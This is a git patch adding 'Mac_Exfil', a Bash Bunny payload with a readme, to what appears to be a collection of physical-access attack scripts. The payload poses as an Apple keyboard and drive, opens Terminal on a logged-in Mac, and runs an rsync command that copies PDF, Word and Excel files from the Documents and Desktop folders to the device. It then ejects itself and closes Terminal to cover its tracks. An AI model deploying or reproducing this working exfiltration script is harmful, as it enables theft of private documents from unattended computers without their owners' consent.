From 2aa4910d0c5a0b0f9ddbf8aaa3e2adbce9ea7f12 Mon Sep 17 00:00:00 2001
From: Carey Balboa <52982329+careyjames@users.noreply.github.com>
Date: Tue, 30 Aug 2022 09:28:28 -0500
Subject: [PATCH] add my own exfil payload (#540)

* add my own exfil payload

Exfiltrates files from logged in users Documents and Desktop folders

* updated

* Update readme.md
---
 .../exfiltration/Mac_Exfil/payload.txt        | 45 +++++++++++++++++++
 .../library/exfiltration/Mac_Exfil/readme.md  | 18 ++++++++
 2 files changed, 63 insertions(+)
 create mode 100755 payloads/library/exfiltration/Mac_Exfil/payload.txt
 create mode 100644 payloads/library/exfiltration/Mac_Exfil/readme.md

diff --git a/payloads/library/exfiltration/Mac_Exfil/payload.txt b/payloads/library/exfiltration/Mac_Exfil/payload.txt
new file mode 100755
index 00000000..d7a252cb
--- /dev/null
+++ b/payloads/library/exfiltration/Mac_Exfil/payload.txt
@@ -0,0 +1,45 @@
+#!/bin/bash
+
+# Title: Mac_Exfil
+# Description: Exfiltrates files from logged in users Documents and Desktop folders
+# Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600
+# Target: macOS
+# Dependencies: none
+#
+# Format your MicroSD XC card for your Bash Bunny Mark II using FAT32 and name it "BUNNY" containing a folder named "loot"
+LED SETUP
+ATTACKMODE HID STORAGE VID_0x05AC PID_0x0267
+QUACK GUI SPACE
+QUACK DELAY 500
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 1000
+LED STAGE1
+QUACK STRING "rsync -av --max-size=5.0m --include='*.pdf' --include='*.docx' --include='*.xlsx' --exclude='*' ~/Documents/ ~/Desktop/ /Volumes/BUNNY/loot"
+QUACK ENTER
+QUACK DELAY 2000
+# Sync filesystem 
+# By default, the Linux kernel writes data to disk asynchronously.
+# Writes are buffered (cached) in memory, and written to the storage device at the optimal time.
+# The sync command forces an immediate write of all cached data to disk.
+# Run sync if you anticipate the system to be unstable, or the storage device to become suddenly unavailable, 
+# and you want to ensure all data is written to disk. (WE ARE ABOUT TO EJECT IT)
+sync
+QUACK DELAY 2000
+LED STAGE2
+QUACK STRING "diskutil eject BUNNY && killall Terminal"
+QUACK ENTER
+QUACK DELAY 1000
+LED STAGE3
+# LED payload complete
+LED W FAST
+mount /dev/mmcblk0p1 /mnt
+files=$(find /mnt/loot -type f | wc -l)
+# debug=$(find /mnt/loot -type f)
+# DEBUG "switch-1-debug" "$files:$debug"
+umount /mnt
+if [ "$files" != "0" ]; then
+LED FINISH
+else
+LED FAIL
+fi
diff --git a/payloads/library/exfiltration/Mac_Exfil/readme.md b/payloads/library/exfiltration/Mac_Exfil/readme.md
new file mode 100644
index 00000000..fa9f7f7d
--- /dev/null
+++ b/payloads/library/exfiltration/Mac_Exfil/readme.md
@@ -0,0 +1,18 @@
+# Mac_Exfil for the BashBunny
+
+* Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600
+* Version: Version 1.0
+* Target: macOS
+
+## Description
+
+A payload that Exfiltrates Word, Excel & PDF files from logged in users Documents and Desktop folders
+
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Purple             | Executing Payload                            |
+| Green              | Successfully grabbed files                   |
+| Red                | Did not get files                            |